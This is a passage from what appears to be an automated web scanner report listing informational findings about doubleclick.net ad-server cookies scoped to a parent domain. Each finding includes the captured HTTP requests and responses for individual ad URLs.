id=c37cbc3380000c9||t=1307964211|et=730|cs=jjlwaoki; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:31 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:31 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N5776.time.comOX3940/B5358797.2;sz=1x1;ord=6942528? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 13 Jun 2011 11:23:31 GMT
Location: http://s0.2mdn.net/viewad/2656415/1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c37cbc3380000c9||t=1307964211|et=730|cs=jjlwaoki; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:31 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:31 GMT
Server: GFE/2.0
Content-Type: text/html

12.13. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N6457.131643.MEEBO/B4840137

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c13c6c3380000fd||t=1307964054|et=730|cs=jg0-yui3; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:20:54 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:20:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N6457.131643.MEEBO/B4840137;sz=1x1;ord=6612153? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 13 Jun 2011 11:20:54 GMT
Location: http://s0.2mdn.net/viewad/2895566/1-1x1_image.jpg
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c13c6c3380000fd||t=1307964054|et=730|cs=jg0-yui3; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:20:54 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:20:54 GMT
Server: GFE/2.0
Content-Type: text/html

12.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cb231c43800000f||t=1307967399|et=730|cs=n7ym895z; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:16:39 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:16:39 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

12.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c29dbc3380000d8||t=1307964640|et=730|cs=xuouziss; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:30:40 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:30:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

12.16. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.specificmedia.com/B5470646.7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c7bd0c338000058||t=1307964365|et=730|cs=t1-9vary; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:05 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:05 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N2998.specificmedia.com/B5470646.7;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=3515%3Bc=152138%3Bb=903239%3Bts=1307963953%3Bdct=;ord=1307963953? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=844620&sz=728x90&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

12.17. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c12c6c338000010||t=1307963967|et=730|cs=l5ucdxnk; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:19:27 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:19:27 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3;sz=160x600;click=http://ad.yieldmanager.com/clk?2,13%3B6cf49325784d605d%3B13088ab5f61,0%3B%3B%3B1948746570,UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAYV-riDABAAAAAAAAAGI5NTczZWFhLTk1YWMtMTFlMC1iZmI2LTFjYzFkZTA0NDI5MgAAAAAAAAA=,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%26v%3Dc%26c%3D6764587%26z%3D1307962990%26g%3D2258000%26l%3D2960776%26cv%3D0%26cm%3DCPM%26d%3D;ord=1307962990? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABl1IWa7dI-CjC5RC68xQYCFUS-ABfl6WkI1WroAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,B%3D10%26Z%3D160x600%26_salt%3D3382701272%26r%3D0%26s%3D1812134,b9573eaa-95ac-11e0-bfb6-1cc1de044292
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1215
Set-Cookie: id=c12c6c338000010||t=1307963967|et=730|cs=l5ucdxnk; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:19:27 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:19:27 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:19:27 GMT
Expires: Mon, 13 Jun 2011 11:19:27 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/c/2e3/%2a/
...[SNIP]...

12.18. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c12c6c3380000e3||t=1307964002|et=730|cs=nxaqmpvl; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:20:02 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:20:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mtn08vi/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=X1BgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6407512/R=0/*;ord=0.16172547359019518? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

12.19. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.Glam/B5345813.2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c34cbc338000074||t=1307964074|et=730|cs=nt4trr8i; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:21:14 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:21:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N553.Glam/B5345813.2;sz=160x600;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0400-_urlenc%3D1-_gclickid%3Dgaclk4df5f0ca7a6e6-_advid%3D1716153-_adid%3D5000036879-_crid%3D500026091-_aipid%3D201106130402-_ge_%3D1%5E2%5E09bdd73895bd3803918767154e79d8531-ord%3D4654773336369544-afid%3D1000212071-dsid%3D864279-sz%3D160x600-zone%3D%2F-sid%3D115232130551023312111-tile%3D1-seq%3D1-tt%3Dj-atf%3D0-url%3D00l3it-flg%3D64-u%3Db0011g2reou1ssci1k9%2Cf0f02sa%2Cg10001s-_gclick_gaclk4df5f0ca7a6e6;ord=4df5f0ca7974a? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7534
Set-Cookie: id=c34cbc338000074||t=1307964074|et=730|cs=nt4trr8i; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:21:14 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:21:14 GMT
Date: Mon, 13 Jun 2011 11:21:14 GMT
Expires: Mon, 13 Jun 2011 11:21:14 GMT
Cache-Control: private



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...

12.20. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.expedia.com/B5280302.8

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c32d4c33800005f||t=1307964456|et=730|cs=0refygag; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:27:36 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:27:36 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982318&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318507&bpp=5&shv=r20110608&jsv=r20110607&correlator=1307964318556&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298%2C33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=193&xpc=vvOBQeNuNQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

12.21. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6090.218.9105273493621/B5528573.7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cae12c4380000a9||t=1307966476|et=730|cs=b68kiuvf; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:01:16 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:01:16 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6090.218.9105273493621/B5528573.7;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUAdiVfk7836FQlS6cCc68tAbj5NNnZW8sdXNhLHQsMTMwNzk2NjQ3MzczNyxjLDM1MzA2MixwYyw3OTk5NSxhYywxNzUyMTIsbyxOMC1TMCxsLDY0NTE4LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVIR3Y2dlNmTmViRmZpc3lUci5wQVl5SG5UbGxuWlc4c2RYTmhMSFFzTVRNd056azJOalEzTWpRM055eGpMRE0xTXpRMU5peHdZeXc0TURRMU5peGhZeXd4TnpZd016SXNieXhPTUMxVE1DeHNMRFkwT1RNMkxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFoSlgwTTVVMmhqWDNvNVkybzRUREZMUm5wZlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzBSdWExcG9UbFZRWkdkZllYbEVSMjkyUW1SNU9FWmZVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDZEZCM1dVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVsbk9FSkJaMVZEUVZGUlFVRkJRVUZqZVV4clkwRkJRVUZCUVM0dlkyNWtQU0V3WjFkMVRWRnFiaTFuVVZFM1pqUlpSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSXdjVTltUW1aNk1WUmlVM3BDWVhKMGJGRm1VVzlmYW5CRFpHWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTnhRVjlCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFVOHhRMUJWUkVGQlFVRjNTVUZITUdKSFdtMXZjVlJxWlZKQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNWFqbGxVa2RTYkdzeVZsbElURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1686381690? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
